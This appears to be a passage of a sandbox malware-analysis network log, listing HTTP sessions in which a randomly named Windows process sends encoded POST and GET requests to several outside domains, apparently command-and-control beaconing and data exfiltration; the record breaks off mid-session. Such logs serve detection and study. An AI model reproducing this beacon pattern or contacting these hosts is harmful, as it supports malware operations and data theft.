                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.7wkto5nk230724z.click
                                                                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                                                                              Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=u9cGq9OyFpd1FYVZtYYNmQwJm5jsjzugyLJfkkBPyPscCW1tUo1tsSPROYdR/cGawwxZO7YQtb+sR71R1Z5xd0L6htYjXA0WBWCsw3wtymakfvsz0ukgUAsoOujLWDq1EhFqzyjMMDrtvRstXmo+WABKUrN4nWL51PQKjgg3Qa4LlBdqkhpWEgSS3DwAf9Cy+g==
Nov 2, 2024 08:12:03.991750002 CET | 906 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:03 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N8qld3sJZua8iW44eBacmyrVtdW1%2B69AqDPd3JsInJMXWWTtZldHzWToibszvZ6J9eRZ1pcNgMz48DxSPRvFXL9g76BjQjF9rgNLjF7U%2BPVvSjgs3ai%2BtfWHwig8%2FiEhjFF%2FAHC74KjjnEKT"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8dc25067df724761-DFW
                                                                                                                              Content-Encoding: gzip
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 2, 2024 08:12:03.991781950 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 65510 | 172.67.131.32 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:12:05.831248999 CET | 830 | OUT | POST /c2q3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.7wkto5nk230724z.click
                                                                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                                                                              Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=u9cGq9OyFpd1F5FZu/sNkwwO4pjssTukyLFfkl0Ex9IcBzRtVsZt5SPRG4dJ18GBww0kO6kQtb6sR+ZR1uVwPUKc09ZFYg0WBWCsw31lymikffcz3MMnagsnGOjLcjqxEhFYzwXmMFntvQctUzc/YABEaLM0oWuj1+VlnjlXdaoOgHQw1QIBWg2hqE50S+/7lo0r3T3uqaEbmlIkWK0MnSU=
Nov 2, 2024 08:12:06.533761978 CET | 901 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:06 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w2woxl0lr2wvLQ83ITpXepXG2emJEoBc1c3dXr2ldsCtuSkOtQL3GS6CR%2FjMsWErS1qXNRCBo2G6vcdlTRyxt2W4TNF15y4P4%2BxmVfQkjEPv5anSWIcLbg%2F2iousDYnSNcd%2F6n8sng7D4wQ%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8dc25077cacb4864-DFW
                                                                                                                              Content-Encoding: gzip
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1244&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=830&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 65522 | 172.67.131.32 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:12:08.378828049 CET | 10912 | OUT | POST /c2q3/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.7wkto5nk230724z.click
                                                                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                                                                              Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=u9cGq9OyFpd1F5FZu/sNkwwO4pjssTukyLFfkl0Ex9AcCFdtVNZt/iPRaodK18GAw0goO6oAtdmsTYNRzctwEUKcsNZRXA1WBWSow3FlymikfZ4zjOknXAsoOujXWDrmEhcvzwDcM1HtuwMtH1A/UABRdLNpoWT9161Dng4AdY0OhzRKkRlfES6c5GdHau3884AWwhT0yawKrCohM6wwzipbA+y1jNaYUwUZaIjWfCOEgPGDZMP5FtmrkE5MAHt9vP6+Y7WLJJxSNL2QDWpgngUFVEdwdb3rV7da6IwdngZOtqGz+PzUGg8kvge4FYW3dhxTa4qVH0IswzioBbqVNyRQWlJPcGxj7xn1XJvjRj/vZlbrMXN6FyiizgbUb1XiioZ67tWwzAC861CCZhBV56HJbT5VVRhX8a4HsCcF9gwoWAkQTFLYxKpdMPK7etlh4GfPDOb/f4pKbTSw7muB/g3YO/f/Pgk2HF62lMpiymRXWZCepUTQ28KSd/pUzkfAHDUkehn4QxpM4oh1PUa8XhzLZI7OK8+JIfM/3igQinooR1jYRdJ7SD8z7azZfgHIHSBFFTsTRD2awhkyRaQclj5AP9Wi8dHvAMLGX9O1BXKoH1CMDrTVKgLJVFDqdrflkc+k1Dsq5dYeWS4OfadSncou2VoFQeA8BfwTG557ACfiKy+JtSO3e6+QdoMbpeN5U5ztZHFWK47f4d3lKsKZGAbWfxGQ7dgGtuqLTzFhCwKFT13AkFDVgfZAz3d6T1fOhFUjqzSlZgv1eP9lS/Mnwqr8mK3s16vpK6vayc7pbeNFFe1npR8di3B+Rk6d+5QR7efqIUsw8KWOzpCzQ29EV+lXmnDmBTeq3YSXhSlR3PI1Bd3gxchBT138zndsjyLo/a0wXQ+sGS8xWkQHQz2eEvUR9weRz7YJIZo0HW40hTF8e/v0px6gYzGxFo6/IIL4eClxILqHEauoZk59H2UKRa6ZXI+S+tHauvcHj/FJwRRwyi [TRUNCATED]
Nov 2, 2024 08:12:09.069901943 CET | 906 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:09 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YS9iQrxk9Uupw0402lvDL8x%2FW23y8bn4ehSLQm%2Bd%2FYCYlPS4Z3LZvL0M2gkiVUtHr1U9tgYBLvmN%2BqXN0CFIejZq9wMraSZ%2FLkqGdQ5h2dMLncpNEw6Fph2%2FnCHqVhGUGqKUxnYkmq5t8PQN"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8dc25087a9552cdc-DFW
                                                                                                                              Content-Encoding: gzip
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1400&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10912&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              4 | 192.168.2.4 | 49155 | 172.67.131.32 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:12:10.923604965 CET | 534 | OUT | GET /c2q3/?Z0WTZ=j/0mpNm2Bsp7DIZ0lL93uSEy3O7+v2qbjKVTngZW+fxoFlp5b+1ximLQJstL0djCplBlCo8niZKHcOIqzu0BFGSn0M5MS0dRMByh0HJ4/jaoTuMehM4oDS0=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.7wkto5nk230724z.click
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:12:11.647187948 CET | 909 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:11 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGqw%2BUFdXC2mDbOXxkbO%2FFXG5NQNNCzFDlz%2FPTyJQhqJFOen2iZf3EQWOr9%2Fo8cclF0QlbjY9%2BCuEooVoASZBHQcK0480xOckZuJpIrTJygysMNCqWLxaGoybH8xFLyeAcSpjvjkNcAL7HZK"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8dc25097b8262857-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                              Nov 2, 2024 08:12:11.647202015 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              5 | 192.168.2.4 | 49191 | 103.191.208.137 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:12:17.490432024 CET | 804 | OUT | POST /w5is/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.roopiedutech.online
                                                                                                                              Origin: http://www.roopiedutech.online
                                                                                                                              Referer: http://www.roopiedutech.online/w5is/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              6 | 192.168.2.4 | 49207 | 103.191.208.137 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:12:20.044430017 CET | 824 | OUT | POST /w5is/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.roopiedutech.online
                                                                                                                              Origin: http://www.roopiedutech.online
                                                                                                                              Referer: http://www.roopiedutech.online/w5is/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              7 | 192.168.2.4 | 49221 | 103.191.208.137 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:12:22.588608027 CET | 10906 | OUT | POST /w5is/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.roopiedutech.online
                                                                                                                              Origin: http://www.roopiedutech.online
                                                                                                                              Referer: http://www.roopiedutech.online/w5is/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              8 | 192.168.2.4 | 49236 | 103.191.208.137 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:12:25.127933025 CET | 532 | OUT | GET /w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.roopiedutech.online
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:12:27.336199045 CET | 519 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                              Connection: close
                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              x-redirect-by: WordPress
                                                                                                                              location: http://roopiedutech.online/w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=&SJuP9=UPQLWRgHAD_
                                                                                                                              x-litespeed-cache: miss
                                                                                                                              content-length: 0
                                                                                                                              date: Sat, 02 Nov 2024 07:12:27 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              9 | 192.168.2.4 | 49320 | 3.33.130.190 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:12:41.014682055 CET | 774 | OUT | POST /mgme/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.suree.bet
                                                                                                                              Origin: http://www.suree.bet
                                                                                                                              Referer: http://www.suree.bet/mgme/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              10 | 192.168.2.4 | 49333 | 3.33.130.190 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:12:43.561191082 CET | 794 | OUT | POST /mgme/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.suree.bet
                                                                                                                              Origin: http://www.suree.bet
                                                                                                                              Referer: http://www.suree.bet/mgme/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49343 | 3.33.130.190 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:12:46.103533030 CET | 10876 | OUT | POST /mgme/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.suree.bet
                                                                                                                              Origin: http://www.suree.bet
                                                                                                                              Referer: http://www.suree.bet/mgme/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49352 | 3.33.130.190 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:12:48.642544985 CET | 522 | OUT | GET /mgme/?Z0WTZ=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.suree.bet
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:12:50.203681946 CET | 399 | IN | HTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:50 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 259
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Z0WTZ=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&SJuP9=UPQLWRgHAD_"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49353 | 3.33.130.190 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:12:55.391976118 CET | 804 | OUT | POST /4q66/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.bocadolobopetra.net
                                                                                                                              Origin: http://www.bocadolobopetra.net
                                                                                                                              Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=osnv7c/A27cFU5gRMAlaowO4gc3icuQRmRcoVNIkc67MaBc2XWSWaDPjX/ydvlrJLugSg1SIJSY3fX0Y0s2y39zvvL243S1mZbTCd8ZjCbiE2RgK95K3wWT9e4//KvEKE6BA7FyYWq402NqtZO+8EMF0AiW+mrzTj1grwZyuU9Ts1N24qdWS/S87U+tnsJuCUQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49354 | 3.33.130.190 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:12:57.930365086 CET | 824 | OUT | POST /4q66/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.bocadolobopetra.net
                                                                                                                              Origin: http://www.bocadolobopetra.net
                                                                                                                              Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=osnv7c/A27cFSaIROhlajwO58M3iGeQVmRQoVI4OcIvMbk42FjuWdDPjcfyiy1qFLulng0eIJSc3fSQY1fux2tzt6b2+zS1mZbTCd8MECb6E3lkK+biwxWT6UY//cfE0E6Bm7HH1Wsk02IWtYcXOPMFyEiXo1r+2rF5d9oi3Z+Tx9r7i7s3FtSYIJ5kThKTLPTj9aVPlQClZeDGypmu4Yg8=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49355 | 3.33.130.190 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:13:00.485275030 CET | 10906 | OUT | POST /4q66/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.bocadolobopetra.net
                                                                                                                              Origin: http://www.bocadolobopetra.net
                                                                                                                              Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49356 | 3.33.130.190 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
